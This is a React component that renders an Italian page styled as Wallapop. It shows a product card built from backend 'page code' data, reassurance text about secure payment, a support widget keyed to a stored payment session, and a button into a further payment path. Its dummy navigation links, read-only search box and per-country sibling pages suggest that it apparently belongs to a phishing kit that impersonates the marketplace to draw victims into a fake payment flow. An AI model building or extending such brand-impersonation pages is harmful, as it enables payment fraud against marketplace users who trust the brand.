import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './WallapopEsSuccess.css';
import './WallapopItSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { API_URL } from '../apiBase';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';
import { wallapopItSuccessCopy as w } from '../wallapopItSuccessCopy';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const LOGO_SRC = `${process.env.PUBLIC_URL || ''}/wallapop-logo.png`;
const FOOTER_IMG_SRC = `${process.env.PUBLIC_URL || ''}/wallapop-it-footer.png`;

function resolvePhotoUrl(raw) {
  const u = (raw || '').trim();
  if (!u) return '';
  if (u.startsWith('http://') || u.startsWith('https://')) return u;
  const base = API_URL.replace(/\/$/, '');
  return `${base}/${u.replace(/^\//, '')}`;
}

function productRefDisplay(pageData, pageCode) {
  const pn = (pageData?.product_name || '').trim().replace(/\s+/g, '');
  if (/^\d+$/.test(pn)) return pn;
  const pc = pageCode || pageData?.page_code || '';
  if (!pc) return '—';
  let h = 0;
  for (let i = 0; i < pc.length; i += 1) h = (h * 33 + pc.charCodeAt(i)) >>> 0;
  return String(1000 + (h % 9000));
}

function IconHeart() {
  return (
    <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" aria-hidden>
      <path d="M20.84 4.61a5.5 5.5 0 0 0-7.78 0L12 5.67l-1.06-1.06a5.5 5.5 0 0 0-7.78 7.78l1.06 1.06L12 21.23l7.78-7.78 1.06-1.06a5.5 5.5 0 0 0 0-7.78z" />
    </svg>
  );
}
function IconMail() {
  return (
    <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" aria-hidden>
      <path d="M4 4h16c1.1 0 2 .9 2 2v12c0 1.1-.9 2-2 2H4c-1.1 0-2-.9-2-2V6c0-1.1.9-2 2-2z" />
      <polyline points="22,6 12,13 2,6" />
    </svg>
  );
}
function IconUser() {
  return (
    <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" aria-hidden>
      <path d="M20 21v-2a4 4 0 0 0-4-4H8a4 4 0 0 0-4 4v2" />
      <circle cx="12" cy="7" r="4" />
    </svg>
  );
}
function ShieldMoneyIcon() {
  return (
    <svg className="wp-shield-ico" viewBox="0 0 24 24" fill="none" aria-hidden>
      <path
        d="M12 2l8 3v7c0 5-3.5 9.5-8 10-4.5-.5-8-5-8-10V5l8-3z"
        fill="#e8faf7"
        stroke="#67C1B0"
        strokeWidth="1.2"
      />
      <text x="12" y="15" textAnchor="middle" fontSize="9" fontWeight="700" fill="#67C1B0" fontFamily="system-ui,sans-serif">
        €
      </text>
    </svg>
  );
}

function WallapopItSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);
  const [imgFailed, setImgFailed] = useState(false);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  useEffect(() => {
    setImgFailed(false);
  }, [pageData?.photo_url]);

  const countryCode = (pageData?.country_code || 'IT').toUpperCase();
  const primaryCurrency = getPrimaryCurrency(countryCode);
  const symbol = getSymbol(primaryCurrency);
  const rawPrice = pageData?.price;
  const productPrice =
    rawPrice != null && String(rawPrice).trim() !== ''
      ? Number.parseFloat(String(rawPrice).replace(',', '.'))
      : null;
  const amountDisplay =
    productPrice != null && Number.isFinite(productPrice)
      ? `${productPrice % 1 === 0 ? String(productPrice.toFixed(0)) : String(productPrice)} ${symbol}`
      : `— ${symbol}`;
  const rawName = (pageData?.product_name || '').trim();
  const productTitle = rawName && !/^\d+$/.test(rawName.replace(/\s+/g, '')) ? rawName : '';
  const photoUrl = resolvePhotoUrl(pageData?.photo_url || '');
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const initials = productTitle ? productTitle.slice(0, 2).toUpperCase() : 'WP';

  const refDisplay = useMemo(
    () => productRefDisplay(pageData, pageCode || pageData?.page_code || ''),
    [pageData, pageCode],
  );

  if (loading && pageCode) {
    return (
      <div className="wp-wrap">
        <div className="wp-loading">Caricamento…</div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="wp-wrap">
      <header className="wp-header">
        <div className="wp-header-inner">
          <a href="#/" className="wp-brand">
            <img src={LOGO_SRC} alt="wallapop" className="wp-brand-img" />
          </a>
          <div className="wp-search-wrap">
            <input type="search" className="wp-search" placeholder={w.searchPlaceholder} readOnly aria-label={w.searchPlaceholder} />
          </div>
          <nav className="wp-nav">
            <a href="#/" className="wp-nav-item">
              <IconHeart />
              <span>{w.favorites}</span>
            </a>
            <a href="#/" className="wp-nav-item">
              <IconMail />
              <span>{w.inbox}</span>
            </a>
            <a href="#/" className="wp-nav-item">
              <IconUser />
              <span>{w.you}</span>
            </a>
            <a href="#/" className="wp-btn-sell">
              + {w.sell}
            </a>
          </nav>
        </div>
      </header>

      <main className="wp-main">
        <div className="wp-main-inner">
          <div className="wp-grid">
            <article className="wp-card">
              <div className="wp-card-media">
                {photoUrl && !imgFailed ? (
                  <img src={photoUrl} alt="" className="wp-card-img" onError={() => setImgFailed(true)} />
                ) : (
                  <div className="wp-card-ph" aria-hidden>
                    {initials}
                  </div>
                )}
              </div>
              <p className="wp-card-price">{amountDisplay}</p>
              <p className="wp-card-ref">{refDisplay}</p>
              {productTitle ? <p className="wp-card-name">{productTitle}</p> : null}
              <div className="wp-card-secure">
                <ShieldMoneyIcon />
                <p>{w.secureLine}</p>
              </div>
              <Link to={index2Path} className="wp-cta-wrap">
                <button type="button" className="wp-cta">
                  {w.cta}
                </button>
              </Link>
            </article>

            <aside className="wp-aside">
              <h1 className="wp-aside-title">{w.mainTitle}</h1>
              <div className="wp-teal-panel">
                <h2 className="wp-teal-h">{w.tealSecureTitle}</h2>
                <p className="wp-teal-p">{w.tealSecureBody}</p>
                <h2 className="wp-teal-h wp-teal-h--second">{w.tealSupportTitle}</h2>
                <p className="wp-teal-p">{w.tealSupportBody}</p>
              </div>
            </aside>
          </div>
        </div>
      </main>

      <footer className="wp-footer">
        <img
          src={FOOTER_IMG_SRC}
          alt=""
          className="wp-footer-img"
          width={1600}
          height={280}
          decoding="async"
        />
      </footer>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default WallapopItSuccess;
